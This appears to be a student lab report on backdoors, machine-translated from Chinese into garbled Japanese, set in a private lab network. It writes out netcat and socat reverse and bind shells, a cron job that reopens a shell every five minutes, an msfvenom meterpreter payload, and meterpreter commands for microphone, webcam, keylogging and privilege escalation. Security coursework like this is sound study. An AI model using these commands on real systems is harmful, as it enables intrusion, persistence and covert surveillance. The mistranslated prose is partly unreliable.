ディレクトリ
1つの関連する概念
1.1バックドア?
- バックドアは、通常の認証プロセスとチャネルシステムを介してアクセス可能ではありません。
1.2バックドア?
- コンパイラは、バックドアを残します
- 滞在バックドアへのオペレーティングシステム
- 滞在バックドアへの応用(最も一般的)
- バックドアを装ったオペレーティングシステム/アプリケーション固有の特別に潜みます
2一般的なバックドア
2.1 NC / netcatを
- 関連の発表
- netcatをあなたがデータを読み書きするためのネットワーク接続を介してTCP / IPプロトコルを使用することができ、強力なネットワークユーティリティです
- http://nc110.sourceforge.net/
- http://netcat.sourceforge.net/。
- オファー以下の主要機能にアクセス
- すべてのアウトバウンドとインバウンドポート(TCPまたはUDP)に接続されています
- トンネルモード機能、それはまた、TCP UDPに、例えば、特定のトンネルを可能にし、すべてのネットワークパラメータ(リモート・ホストとのトンネルへの接続を許可する送信元ポート/インターフェースのリスニングポート/インターフェース)を指定することができます。
内蔵ポートスキャン機能乱数発生器で - 高度そのような緩衝伝送モードとして使用オプション、(1行ごとにN秒)、16進ダンプでデータを送信し、受信した(または指定したファイルにstderrに)
- オプションのRFC854のtelnetコードパーサーと応答
- システム
- Linuxの場合:一般的にその使用のための説明書を参照してくださいするには、「manのnetcat」や「男のNC」、netcatを付属しています。
- ダウンロードncat.rar、解凍を使用することができます
- 勝利は、Linuxのシェルを得るwin7の/カーリーLinuxベース
- WindowsサーバのIPアドレスを取得します。
ipconfig/all
- 開閉可能な窓リスニング:
ncat.exe -l -p 8888
- Linuxは、接続ウィンドウでリバウンド:
nc 192.168.137.133 8888 -e /bin/sh
- Linuxのシェルを取得するには、Windowsは、任意のコマンドを実行することができます。私たちは試みるのlsコマンドを
- WindowsサーバのIPアドレスを取得します。
- Linuxは勝つシェル得られます
- LinuxのホストのIPアドレスを取得します。
ifconfig/all
- リスナーのコマンドを実行しているLinuxの場合:
nc -l -p 8888
- 接続のLinuxでWindowsのリバウンド:
ncat.exe -e cmd.exe 192.168.137.130 8888
- Linuxは、Windowsのコマンドプロンプトを参照してください。私たちはみてくださいDIRコマンドとにwhoamiコマンドを
- LinuxのホストのIPアドレスを取得します。
- 知識の拡充のnetcat
- 参考:① Netcatをユーザーガイド、② 導入方法を使用してnetcatを
- socatに関する--Netcatプラス
リファレンス:へsocatに関する入門
Windowsのバージョンダウンロード
2.2メーターPreter
2.3トウモロコシ
- トウモロコシのメカニズム
- cronのは、与えられた仕事を実行するために指定した時刻にシステムをさせることができ、我々はcronのメカニズムを管理するために、crontabコマンドを使用することができます
corntab表現
+---------------- minute 分钟(0 - 59) | +------------- hour 小时(0 - 23) | | +---------- day 日期(1 - 31) | | | +------- month 月份(1 - 12) | | | | +---- week 星期(0 - 7) (星期天=0 or 7) | | | | | * * * * * 要运行的命令
- crontabのコマンド
man crontab
Viewコマンドマニュアル
- トウモロコシの使用例
- トウモロコシのタスクの作成:
crontab -e
任意のエディタを選択し、私はnanoを使用しています
*/1 * * * * echo "Have a break now." >> /tmp/test.txt
毎分出力が/tmp/test.txtに今休憩を持っているが
- 定期的なタスクを表示します。
crontab -l
- キャプチャ/tmp/test.txt
- トウモロコシのタスクの作成:
3実験内容
3.1シェル、cronの開始を操作するホストを取得するのnetcat
- 勝利は聞くに転じ:
ncat.exe -l -p 8888
- カーリーは起動にcron:5分ごとに、対応するIPホストのシェルを得るために、
crontab -e
*/5 * * * * /bin/netcat 192.168.137.133 8888 -e /bin/sh
五分後......
3.2は、シェルを操作するタスクを開始する計画をホストを取得しsocatに関する
- 勝利は socatに関するタスクを作成します
- [コントロールパネル] - > [管理ツール] - > [タスクスケジューラ - >タスクを作成します(右サイドバー)
- 一般:設定名は20175207 Iセットです
- トリガー:新(以下提供)
- アクション:(下に設けられた)を作成します
~~パスのためのプログラムやスクリプト〜socat.exe〜
~~追加パラメータとしてtcp-listen:8888 exec:cmd.exe,pty,stderr
ポート8888にバインドされたCMD.EXEすると、CMD.EXEのstdoutにリダイレクト標準エラー出力
- 注文確認
- 20175207のビューのタスクのステータスが準備ができて、ファイル名を指定して実行]をクリックします
- カーリーの買収は、LinuxでシェルをCMD:
socat - tcp:192.168.137.133:8888
3.3 MSFのmeterpreter実行ファイルsocatに関するNCAT使用またはホストに転送し、ホストは、シェル取得動作します
- カーリーの生成バックドアLinuxの実行
注:このIP IPアドレス制御終了、すなわちホストのIPカーリー
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=8888 -f exe > 20175207_backdoor.exe
- 20175207_backdoor.exeバックドアファイルは、ホストwin7のに転送され、
- 勝つ
ncat.exe -lv 8888 > 20175207_backdoor.exe
- カーリー
nc 192.168.137.133 8888 < 20175207_backdoor.exe
注:ここではIPアドレスはwin7の、すなわち、ホストIPとIP充電されています - win7の中のファイルを表示するには、バックドアがあります
- 勝つ
- カーリーのリスニング
- コンソールにMSF:
msfconsole
- 監視モジュールに配置されたペイロードを使用して、(次のように構成された)リスニング開始
制御端子を使用してIPセットLHOST、すなわちカリIP:注
- コンソールにMSF:
- ウィンバックドアを実行している
ファイアウォールを経由して、事前には、バックドアを設定することができます
3.4 MSFのmeterpreter生成されたコンテンツの取得対象ホストオーディオ、カメラ、キーロガーなど
- オーディオを取得します。
recorf_mic
- カメラを取得します:
webcam_snap
- スクリーンショット:
screenshot
- キーロガー
- keyscan_start:キーボードのレコードを開きます。
- キーボードの表示キャプチャログ情報:keyscan_dump
- ストップキーロガー機能:keyscan_stop
- 右に言及:
getsystem
システムは、最高権威であります - 現在のユーザーを表示します。
getuid
理由は、現在のユーザーの権利を言及するのに失敗は、管理者です
シェルコードを使用して生成さ3.5 MSFは、リバウンド接続シェルを得、1回のpwn1の練習中に注ぎ
4つの思考問題
- あなたは、あなたのシステムのバックドアを入力することも可能な方法のリストを考えることができますか?
- ネットワーク・ファイル・バックドアからダウンロード
- あなたは(勝利/ Linux)を起動するために記載されているバックドアの道をどのように知っています
- バックドア結合スレッド
- レジストリを変更します。
- 何があなたをそこに機能Metepreterの印象的な配列を与えますか?
- 建設シェルコード
- ビューのプロセスと関連する操作
- リモートデスクトップコントロール
- このマシンモニタ
- どのようにあなたのシステムがバックドアをインストールされていない見つけるには?
実験に遭遇した問題5
- Win7の中にバックドアAPPCRASHのエラーが表示されますを実行します
- 適切な解決策は、win10のための再手術、発見されません
- Win10が正常にタスクを作成した後で実行することはできません
- ファイアウォールsocat.exeの通過を許可するようにファイアウォールを設定します
- タスクを実行した後カーリーホストを聞くことができません
- ホストは、タスクを停止して、タスクを再実行します